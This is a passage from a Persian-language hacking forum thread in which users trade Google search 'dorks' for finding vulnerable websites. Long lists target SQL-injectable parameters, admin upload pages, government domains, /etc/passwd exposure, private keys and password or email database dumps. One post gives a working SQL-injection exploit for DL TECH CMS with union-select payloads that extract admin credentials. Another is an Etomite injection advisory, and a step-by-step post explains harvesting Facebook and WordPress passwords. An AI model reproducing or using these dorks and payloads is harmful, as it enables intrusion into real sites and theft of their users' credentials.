"error found handling the request" cocoon filetype:xml

intitle:"Execution of this script not permitted"

intitle:"Error Occurred" "The error occurred in" filetype:cfm

warning "error on line" php sablotron

"Fatal error: Call to undefined function" -reply -the -next

filetype:asp "Custom Error Message" Category Source

"Can't connect to local" intitle:warning

intitle:"Under construction" "does not currently have"

"access denied for user" "using password"

"Warning: Cannot modify header information - headers already sent"

"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"

An unexpected token "END-OF-STATEMENT" was found

"detected an internal error [IBM][CLI Driver][DB2/6000]"

"A syntax error has occurred" filetype:ihtml

R33VES™
11-03-2012, 04:04 PM
من در عجبم چرا تاپیک به این مهمی خوابیده!!!
یه پست با اجازه افراد میذارم تا این تاپیک بالا بیاد...
حیفم میاد تاپیک به این خوبی که خیلی از تازه واردا دنبالش هستن اینطوری خاک بخوره روش
با اجازه دوستان و مدیران عزیز....

esis94
12-16-2012, 10:52 PM
دوستان لطفا دورك هاتون رو در قالب txt ضميمه كنيد تا ما هم بهره مند بشيم
با سپاس%

sah2281987
12-19-2012, 08:57 PM
سلام دوستان
این سایت رو دوستم طراحی کرده و هنوز به مرحله اجرا در نیومده
[Only registered and activated users can see links]
خواستم ببینین مشکل خاصی نداره؟
در ضمن می تونین با شماره دانشجویی 89510199 و پسورد 123 و با انتخاب گزینه ی دانشجو وارد سایت شوید.
ممنونم

foxiii
12-22-2012, 08:44 PM
سلام دوستان
یه سری دورک رو پیوست میکنم اگه خوشتون اومد و تشکرا بالا بود
میگردم واستون بازم پیدا میکنم
:83:

amirhacker76
12-27-2012, 02:31 AM
سلام یک دورک یعنی چند تا دورک برای آپلود فایل های html یا php میخوام

ACC3SS
12-27-2012, 10:22 PM
Dork برای SQLi

amirhacker76
12-30-2012, 11:27 PM
دوست عزیز acc3ss خیلی ممنونم ولی این دورک ها قدیمی هستن .

esis94
01-24-2013, 11:46 PM
سلام_اين دورك sqli priv8 رو يادم نيست از كجاي آشيانه پيدا كردم ولي خيلي بازده داره:

inurl:"id=" & intext:"Warning: mysql_num_rows()

مال هركي بود حلالم كنه!

masanger
01-29-2013, 07:37 PM
سلام یه دورک میخواست که بتونه یک سایتی که بهش میدی رو لینک باگش رو بهم بده ...!
البته اگه کامل تر بگم من اسکن کردم سایت رو و باگ داشته فقط نمیدونم چجوری باید لینکشو از Acunetix بگیرم... ؟ :92:

خداوکیلی این چه وضشه تو این هفته دوتا سوال حیاطی پرسیدم جفتشم بی جواب موندن :17:
خدا وکیلی یه کمک کوچیک به کسی صدمه نمیزنههه ....!!

shiraz online
02-15-2013, 12:17 PM
سلام یه دورک میخواست که بتونه یک سایتی که بهش میدی رو لینک باگش رو بهم بده ...!
البته اگه کامل تر بگم من اسکن کردم سایت رو و باگ داشته فقط نمیدونم چجوری باید لینکشو از acunetix بگیرم... ؟ :92:

خداوکیلی این چه وضشه تو این هفته دوتا سوال حیاطی پرسیدم جفتشم بی جواب موندن :17:
خدا وکیلی یه کمک کوچیک به کسی صدمه نمیزنههه ....!!

منم دوست دارم همین موضوع را بدونم.
شرمنده اگر اینجا مطرح کردم.

ip00
02-15-2013, 01:43 PM
سلام دوستان :57:

من اطلاعاتی درباره ی هک و نفوذ ندارم
یــک سوال داشتم دورک باگ چـــــیــه ؟؟؟؟:92:

Milad Hacking
03-26-2013, 10:36 PM
سلام

یه سری درک جدید ضمیمه کردم که نسبتا جدید هستن:96:

Milad Hacking
03-27-2013, 07:01 AM
سلام مجدد

یه سری درک دیگه میزارم که خوبن:26:


Dork Sql 2013
inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/

Milad Hacking
05-08-2013, 10:54 AM
دورکی که دیروز کشف شده و کلی سایت میشه باهاش زد همه هم باگ sql دارن و....



inurl:"/page.php?IDMenu=" and Developed by Revolution Technologies

Milad Hacking
05-10-2013, 05:00 AM
سلام



Exploit Title: DL TECH CMS SQL Injection

================================================== =================================

# Google Dork: site:.pk intext:"Designed & Developed By: DL TECH" inurl:".php?"

================================================== =================================

# Exploit Author: Ashiyane Digital Security Team

================================================== =================================

# Vendor Homepage: [Only registered and activated users can see links]

================================================== =================================

# Tested On : All versions

================================================== =================================

# Demo1 : [Only registered and activated users can see links]'
# Demo2 : [Only registered and activated users can see links]'
# Demo3 : [Only registered and activated users can see links]'

================================================== =================================

# Example :

[Only registered and activated users can see links]'+/*!50000union*/+select+1,2,/*!(usrname)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_fte
dbs.tbl_admin--+

[Only registered and activated users can see links]'+/*!50000union*/+select+1,2,/*!(password)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ft
edbs.tbl_admin--+

================================================== =================================

# Injection Help : Important Table Is 'tbl_admin' And Columns Are 'usrname' AND 'password'

================================================== =================================

# contact me : [Only registered and activated users can see links]
InJecTable Was Here ... Hamedan Bax !

Milad Hacking
05-12-2013, 04:19 PM
این اقای امیر حسین Amirh03in که تو اشیانه فعال هستن کشف کرده


##############
# Exploit Title : Etomite CMS SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# CMS Home : [Only registered and activated users can see links]
#
# Home : [Only registered and activated users can see links]
#
# Security Risk : Medium
#
# Version : 0.6
#
# Dork : "Powered by Etomite 0.6 Final (Prelude)." inurl:index.php?id=
#
# Tested on: Linux
#
##############
#Location:site/[path]/index.php?id=[SQL]
#
#
#DEm0:
# [Only registered and activated users can see links]
#
# [Only registered and activated users can see links]
#
# [Only registered and activated users can see links]
#
# [Only registered and activated users can see links]
#
# [Only registered and activated users can see links]
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

david3
07-17-2013, 03:26 AM
سلام میخواستم ببینم درکی هست که باهاش بشه تو کدای سایتا جستو جو کرد؟؟؟؟؟:o

h0j@T
07-17-2013, 10:43 AM
سلام میخواستم ببینم درکی هست که باهاش بشه تو کدای سایتا جستو جو کرد؟؟؟؟؟:o

با سلام دوست عزیز

شما اگه گوگل هکینگ را کامل یاد بگیری می تونی خیلی کارها انجام دهی

موفق باشید

david3
07-17-2013, 11:31 PM
با سلام دوست عزیز

شما اگه گوگل هکینگ را کامل یاد بگیری می تونی خیلی کارها انجام دهی

موفق باشید
مرسی داداش
میشه لینک تاپیک گوگل هکینگ رو بذاری :37:
آخه من بلد نیستم تو این انجمن جدید جوستو جوکنم:69::39:

ehsanmsx
07-26-2013, 04:38 AM
Method 1: Facebook!

We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=
Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!
The Dork: filetype:sql inurl:wp-content/backup-*

Method 3: [Only registered and activated users can see links]!

This will look for the user and passwords of [Only registered and activated users can see links] users
The Dork: inurl:/[Only registered and activated users can see links]

Method 4: FrontPage!

This will find all users and passwords, similar to above.
The Dork: ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

Method 5: Symfony!

This finds database information and logins
The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak!

This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)
The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!

This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!

Simple dork which looks for all types of admin info
The Dork: "admin account info" filetype:log

Method 9: Private keys!

This will find any .pem files which contain private keys.
And the Ultimate one, the regular directory full of passwords.
The Dork: filetype:pem pem intext:private

Method 10: The Dir of Passwords!

Simple one!
The Dork: intitle:"Index of..etc" passwd

ahmad122
07-26-2013, 05:14 AM
سلام

راستش من دقیق نمیدانم چطور در سایتها ازش استفاده کنم!
میشه راهنمایی کنید...

Milad Hacking
07-26-2013, 05:21 AM
سلام

راستش من دقیق نمیدانم چطور در سایتها ازش استفاده کنم!
میشه راهنمایی کنید...



باید توی گوگل جستجو کنید

مثال این

intext:charset_test= email= default_persistent=

Milad Hacking
07-26-2013, 05:24 AM
اینم یکی از من خودم کشف و ثبتش کردم

intext:Aberdeen Dry Rot inurl:inner-page.php?id=

Auto Run
07-27-2013, 11:55 AM
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
in****:"Powered By : SE Software Technologies" filetype:php
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=

Auto Run
07-28-2013, 12:01 PM
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=

darkmind
07-28-2013, 01:49 PM
دورک چیه
چطوری باهاش کار می کنند
تازه کار ام

Silent Death
08-04-2013, 11:09 AM
دورک چیه
چطوری باهاش کار می کنند
تازه کار ام

میشه گفت یه روش برای پیدا کردن آسیب پذیری توی سایتها هستش

Sahoo
08-11-2013, 12:14 PM
لیست دانشگاه ها

inurl:"view.asp?page=" intext:"plymouth"

توسط دورک های زیر میتونید Config کل سایت های روی سرور رو بکشید بیرون


intext:"root:x:0:0:root:/root:/bin/bash" inurl:*=/etc/passwd
inurl:"/root/etc/passwd" intext:"home/*:"

Sahoo
08-11-2013, 12:16 PM
PriVaTe DorKs


intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin

Sahoo
08-12-2013, 04:11 PM
Pass Hacking Dorks


"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"[Only registered and activated users can see links]*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb

Sahoo
08-12-2013, 04:49 PM
inurl:index.php?id= site:*gov.pl
inurl:index.php?id= site:*gov
inurl:news.php?id= site:*gov.af
inurl:oferta.php?id= site:*gov.af
inurl:trainers.php?id= site:*gov.pl
inurl:article.php?ID= site:*gov.uk
inurl:play_old.php?id= site:*gov.au
inurl:declaration_more.php?decl_id= site:*gov.in
inurl:Pageid= site:*gov
inurl:pagina.php?left= site:*.gov.au
inurl:layout.php?id=120'= site:*gov.pl
inurl:principal.php?id=123'= site:*gov.uk
inurl:standard.php?base_dir= site:*gov
inurl:home.php?where= site:*gov.pl
inurl:page.php?sivu= site:*.pl
inurl:*inc*.php?adresa= site:*gov
inurl:padrao.php?str= site:*gov
inurl:include.php?my= site:*.gov.af
inurl:show.php?home= site:*gov.br
inurl:index.php?lid=20= site:*gov.au
inurl:principal.php?id=30= site:*gov
inurl:file.php?id=205= site:*gov.au
inurl:info.php?id=25155= site:*gov.af
inurl:enter.php?id=203= site:*gov.uk
inurl:general.php?id=50= site:*gov
inurl:principal.php?id=705= site:*gov.za
inurl:standard.php?id=303= site:*.gov.ie
nurl:nota.php?v= site:*gov.bc.ca
inurl:home.php?str= site:*ed.gov
inurl:press.php?panel= site:*gov.mu
inurl:page.php?mod= site:*gov
inurl:default.php?param= site:*gov
inurl:down*.php?texto= site:*go.af
inurl:mod*.php?dir= site:*gov.ie
inurl:view.php?where= site:*gov.za
inurl:blank.php?subject= site:*gov.br
inurl:path.php?play= site:*gov.uk
inurl:base.php?l= site:*gov.au

Sahoo
08-13-2013, 11:29 PM
Dork Email hacking

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e

ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password

ext:sql intext:@hotmail.com intext:password ]

Sahoo
08-13-2013, 11:54 PM
یه سری درک که به کمک اونها میتونید به صفحات حساس مدیریت سایت ها دست یابید



کد:
"inurl:admin/addproduct.asp"
"inurl:admin/user.asp"
"inurl:admin/addpage.php"
"inurl:admin/gallery.asp"
"inurl:admin/image.asp"
"inurl:admin/adminuser.asp"
"inurl:admin/productadd.asp"
"inurl:admin/addadmin.asp"
"inurl:admin/add_admin.asp"
"inurl:admin/add_admin.php"
"inurl:admin/addnews.asp"
"inurl:admin/addpost"
inurl"inurl:admin/addforum.???"
"inurl:admin/addgame.???"
"inurl:admin/addblog.????"
"inurl:admin/admin_detail.php"
"inurl:admin/admin_area.php"
"inurl:admin/product_add.php"
"inurl:admin/additem.php"
"inurl:admin/addstore.php"
"inurl:admin/add_Products.???"
"inurl:admin/showbook.???"
"inurl:admin/selectitem.???"
"allinurl:admin/addfile.???"
"inurl:admin/addarticle.asp"
"inurl:admin/addfile.asp"
"inurl:admin/upload.php"
"inurl:admin/upload.asp"
"inurl:admin/addstory.php"
"inurl:admin/addshow.php"
"inurl:admin/addmember.asp"
"inurl:admin/addinfo.asp"
"inurl:admin/addcat.asp"
"inurl:admin/cp.asp"
"inurl:admin/productshow.asp"
"inurl:admin/addjob.asp"
"inurl:admin/addjob.???"
"inurl:admin/addpic.???"
"inurl:admin/viewproduct.???"
"inurl:admin/addaccount.php"
"inurl:admin/manage.php"
"inurl:admin/addcontact.???"
"inurl:admin/viewmanager.???"
"inurl:admin/addschool.???"
"inurl:admin/addproject.???"
"inurl:admin/addsale.???"
"inurl:admin/addcompany.???"
"inurl:admin/payment.???"
"inurl:user/emp.???"
"inurl:admin/addmovie.???"
"inurl:admin/addpassword.???"
"inurl:admin/addemployee.???"
"inurl:admin/addcat.???"
"inurl:admin/admin.???"
"inurl:admin/admincp.???"
"inurl:admin/settings.???"
"inurl:admin/addstate.???"
"inurl:admin/addcountry.???"
"inurl:admin/addmedia.???"
"inurl:admin/addcode.???"
"inurl:admin/addlinks.???"
"inurl:admin/addcity.???"

Sahoo
09-27-2013, 11:06 AM
یک دورک که چت روم های آسیب پذیر رو میاره


intitle:ET-Chat v3.0.7 - Login



موفق باشید

mehran1376
10-15-2013, 04:22 PM
سلام
اینم از ما

"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID"

mehran1376
10-15-2013, 04:24 PM
سلام

show.php?pname=
base.php?loc=
file.php?q=
gery.php?sivu=
padrao.php?header=
layout.php?abre=
index3.php?pref=
enter.php?subject=
page.php?modo=
page.php?left=
base.php?abre=
index3.php?addr=
blank.php?pr=
*inc*.php?get=
print.php?play=
padrao.php?secao=
index.php?str=
general.php?sekce=
show.php?m=
head.php?b=
index1.php?mod=
home.php?showpage=
home.php?cmd=
index1.php?read=
page.php?load=
general.php?choix=
home.php?my=
start.php?param=
layout.php?sekce=
enter.php?module=
mod*.php?secao=
show.php?n=
start.php?pname=
down*.php?doshow=
index2.php?pre=
layout.php?nivel=
home.php?base_dir=
include.php?eval=
standard.php?xlink=
info.php?home=
general.php?body=
head.php?play=
file.php?index=
mod*.php?OpenPage=
index.php?b=
principal.php?ki=
sub*.php?panel=
path.php?sec=
nota.php?left=
default.php?header=
padrao.php?qry=
file.php?corpo=
padrao.php?strona=
sub*.php?z=
pagina.php?include=
page.php?link=
start.php?abre=
print.php?goFile=
*inc*.php?c=
down*.php?cmd=
home.php?middle=
sub*.php?open=
include.php?second=
sitio.php?menue=
path.php?tipo=
home.php?addr=
gery.php?pref=
pagina.php?k=
head.php?strona=
general.php?e=
blank.php?get=
blank.php?sivu=
sitio.php?read=
home.php?thispage=
pagina.php?loc=
layout.php?qry=
print.php?*root*=
show.php?to=
view.php?u=
view.php?chapter=
principal.php?nivel=
info.php?secao=
nota.php?abre=
standard.php?menu=
index2.php?pollname=
index3.php?path=
index.php?base_dir=
general.php?secao=
mod*.php?home=
down*.php?section=
default.php?index=
general.php?doshow=
padrao.php?abre=
enter.php?seite=
down*.php?lang=
main.php?xlink=
index3.php?base_dir=
gery.php?redirect=
layout.php?basepath=
pagina.php?modo=
index.php?adresa=
down*.php?u=
main.php?mod=
file.php?start=
view.php?redirect=
index2.php?u=
padrao.php?*
info.php?ev=
index1.php?nivel=
include.php?seccion=
view.php?lang=
mod*.php?include=
mod*.php?seccion=
